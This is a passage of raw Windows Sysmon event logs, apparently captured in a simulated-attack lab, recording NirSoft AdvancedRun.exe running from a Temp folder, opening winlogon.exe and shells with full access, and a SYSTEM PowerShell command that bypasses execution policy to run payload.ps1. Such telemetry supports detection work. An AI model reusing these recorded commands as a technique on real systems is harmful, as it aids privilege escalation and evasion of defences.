m.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004074053Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.003{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with 
different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfgC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004072096Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:23.551{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004069054Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.384{834264DD-132A-61EB-5808-000000002702}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoExit -executionpolicy bypass -File "c:\users\Administrator\desktop\payload.ps1"C:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfgATTACKRANGE\Administrator 10341000x80000000000000004069053Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.382{834264DD-DAE7-61EA-1700-000000002702}13003992C:\Windows\System32\svchost.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004069052Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.382{834264DD-DAE7-61EA-1700-000000002702}13003992C:\Windows\System32\svchost.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT 
AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004069051Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.381{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069050Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.381{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-12C7-61EB-4508-000000002702}2204C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069049Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.381{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program 
Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069048Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.381{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069047Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.380{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069046Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.380{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069045Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.380{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069044Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.379{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069043Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.379{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069042Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.379{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069040Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.373{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069014Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
